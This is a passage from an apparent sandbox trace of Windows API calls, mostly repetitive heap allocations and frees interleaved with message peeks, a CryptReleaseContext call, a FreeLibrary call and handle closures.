lpsz="__CRYPT_CONTEXT") returned 0xf [0265.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0265.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.009] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0265.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.009] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0265.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0265.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0265.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0265.011] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.011] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0265.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.011] FreeLibrary (hLibModule=0x756e0000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.011] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0265.012] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0265.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0265.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0265.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0265.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0265.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0265.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.016] CloseHandle (hObject=0x2a0) returned 1 [0265.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0265.018] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0265.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0265.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0265.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0265.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0265.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.019] CloseHandle (hObject=0x2d0) returned 1 [0265.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0265.022] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0265.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0265.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0265.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3e680 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0265.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0265.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0265.027] HeapFree (in: hHeap=0x970000, 